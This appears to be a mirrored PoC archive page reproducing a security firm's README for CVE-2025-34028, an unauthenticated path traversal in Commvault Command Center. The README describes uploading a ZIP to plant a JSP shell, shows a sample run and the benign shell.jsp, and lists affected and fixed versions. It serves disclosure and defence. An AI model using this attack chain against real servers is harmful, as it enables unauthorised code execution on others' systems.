Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-34028 PoC — Commvault Command Center Innovation Release <= 11.38.25 Unathenticated Install Package Path Traversal

Source
Associated Vulnerability
Title:Commvault Command Center Innovation Release <= 11.38.25 Unathenticated Install Package Path Traversal (CVE-2025-34028)
Description:The Commvault Command Center Innovation Release allows an unauthenticated actor to upload ZIP files that represent install packages that, when expanded by the target server, are vulnerable to path traversal vulnerability that can result in Remote Code Execution via malicious JSP. This issue affects Command Center Innovation Release: 11.38.0 to 11.38.20. The vulnerability is fixed in 11.38.20 with SP38-CU20-433 and SP38-CU20-436 and also fixed in 11.38.25 with SP38-CU25-434 and SP38-CU25-438.
Readme

# CVE-2025-34028
A Commvault Pre-Authenticated Remote Code Execution Proof of Concept
 
See our [blog post](https://labs.watchtowr.com/) for technical details

# Detection in Action


```
 python watchtowr-vs-commvault-rce-CVE-2025-34028.py --url https://192.168.1.1
                         __         ___  ___________                   
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________ 
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|   
                                  \/          \/     \/                            
          
        watchtowr-vs-commvault-rce-CVE-2025-34028.py
        (*) Commvault Unauthenticated Remote Code Execution (CVE-2025-34028) POC by watchTowr
        
          - Sonny , watchTowr (sonny@watchTowr.com)

        CVEs: [CVE-2025-34028]
        
[*] Targeting https://192.168.1.1
[*] Verifying presence of Commvault
[*] Uploading to  /reports/MetricsUpload/2GfMIJdK/
[*] Fetching System User from  https://192.168.1.1/reports/MetricsUpload/2GfMIJdK/.tmp/dist-cc/dist-cc/shell.jsp
[*] System User EC2XXX-XXXXXXX$

```

# Description

This script is a proof of concept for CVE-2025-34028, for Commvault Web Interfaces. By uploading a zip file containing a code execution .jsp file, the zip file is uploaded to a public facing directory and the system user is detailed within the response. More details are described within our [blog post] (https://labs.watchtowr.com/).

# Note
The PoC script uses a hardcoded zip file containing the following files:
* /ccApp/index.html
* shell.jsp

Shell.jsp contents:

```
<%@ page import="java.util.*" %>
<html>
<body>
  <h3>System Information</h3>
  <p>Current User: <%= System.getProperty("user.name") %></p>
</body>
</html>
```

# Affected Versions

* Commvault Windows and Linux 11.38.0 - 11.38.19

# Remediated Versions

* Commvault Windows and Linux 11.38.20 as of April 10, 2025
* Commvault Windows and Linux 11.38.25 as of April 10, 2025

More details at [Commvault Advisory](https://documentation.commvault.com/securityadvisories/CV_2025_04_1.html)


# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber
File Snapshot

[4.0K] /data/pocs/70b83bd749c7d62a08d869c66976c2eba5562e76 ├── [2.4K] README.md └── [3.7K] watchtowr-vs-commvault-rce-CVE-2025-34028.py 0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →